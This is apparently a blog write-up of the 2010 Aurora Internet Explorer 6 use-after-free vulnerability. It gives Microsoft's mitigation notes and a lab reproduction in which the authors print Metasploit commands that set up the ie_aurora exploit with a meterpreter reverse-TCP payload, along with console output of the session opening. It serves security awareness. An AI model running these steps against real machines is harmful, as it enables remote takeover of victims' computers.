Aurora Attack - Zero day exploit in IE6

Aurora attacks, which is known to be originated from china, is a major attack in the recent past which used an Internet explorer exploit code to attack companies like Google and Adobe and succeeded in stealing some intellectual properties.

According to Microsoft, The vulnerability exists as an invalid pointer reference within Internet Explorer. It is possible under certain conditions for the invalid pointer to be accessed after an object is deleted. In a specially-crafted attack, in attempting to access a freed object, Internet Explorer can be caused to allow remote code execution.

Vulnerability has been exploited on IE 6 till now and it can be exploited on IE 7 also, it’s not yet been done on IE 7 because of memory layout differences in IE 7.Exploit code has been published in the internet and can be used by anyone to craft similar attacks. Metasploit which is an open-source hacking tool has also released a working exploit of the attack which will be explained in detail in the last section.

Mitigation for this vulnerability according to the Microsoft is explained below:

• Data Execution Protection (DEP) is enabled by default in Internet Explorer 8 on the following Windows operating systems: Windows XP Service Pack 3, Windows Vista Service Pack 1, Windows Vista Service Pack 2, and Windows 7.
• Protected Mode in Internet Explorer on Windows Vista and later Windows operating systems limits the impact of the vulnerability.
• In a Web-based attack scenario, an attacker could host a Web site that contains a Web Page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker’s Web site.
• An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate with administrative user rights.
• By default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. This mode sets the security level for the Internet zone to High. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone.
• By default, all supported versions of Microsoft Outlook, Microsoft Outlook Express, and Windows Mail open HTML e-mail messages in the restricted sites zone. The Restricted sites zone helps mitigate attacks that could try to exploit this vulnerability by preventing Active Scripting and ActiveX controls from being used when reading HTML e-mail messages. However, if a user clicks a link in an e-mail message, the user could still be vulnerable to exploitation of this vulnerability through the Web-based attack scenario.

Exploiting the Vulnerability:

We tried to reproduce the attack scenario using metasploit and were able to do it successfully. It was quite scary to see how the exploit works and how easy it is for a hacker to control the vulnerable system.

Software used for the attack and analysis:

• Metasploit Framework
   
• 2 networked VMware images running win XP with sp2.
   
• Tcpview

We were able to setup metasploit in one VMware image to run as server to control the hacked system by issuing following commands:

msf > use exploit/windows/browser/ie_auroramsf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(ie_aurora) > set LHOST 192.168.1.30

LHOST => 192.168.1.30msf exploit(ie_aurora) > set LPORT 6666

LPORT => 6666msf exploit(ie_aurora) > set URIPATH /

URIPATH => /msf exploit(ie_aurora) > exploit

and this was the response which shows that the server was started

[*] Exploit running as background job.msf exploit(ie_aurora) >

[*] Started reverse handler on port 6666[*] Using URL: http://0.0.0.0:8080/

[*] Local IP: http://192.168.1.30:8080/[*] Server started.

We then opened Internet explorer in the vulnerable system(Other VMware running win XP with SP2) and entered the IP address(192.168.1.30 in our case) of the server in the browser and got the following response at the server end:

[*] Sending Microsoft Internet Explorer "Aurora" Memory Corruption to client 192.168.1.57[*] Sending stage (723456 bytes)

[*] Meterpreter session 1 opened (192.168.1.30:6666 -> 192.168.1.57:1038)

We then had to issue following command to start communicating with the exploited system:

sessions -i 1[*] Starting interaction with 1...

Examining the exploited system:

Checked the ports on the exploited system and found the backdoor which was opened by the exploit. Screenshot of the backdoor can be found below:

The port opened by the internet explorer can be seen in the fig 1.1 which will be used as backdoor in this scenario.

There are no other indications to find out that the computer has been hacked and can be controlled from a remote server.

Controlling the Exploited computer:

It’s really scary to see how a hacked computer can be controlled. An example of shell being controlled by the server can be seen below:

These are the following commands which can be used to control the hacked system including the command to take control of the shell.

Core Commands
=============

Stdapi: File system Commands
============================

 Stdapi: Networking Commands
===========================

Stdapi: System Commands
=======================

Stdapi: User interface Commands
===============================

References

http://blog.metasploit.com/2010/01/reproducing-aurora-ie-exploit.html
http://www.microsoft.com/technet/security/advisory/979352.mspx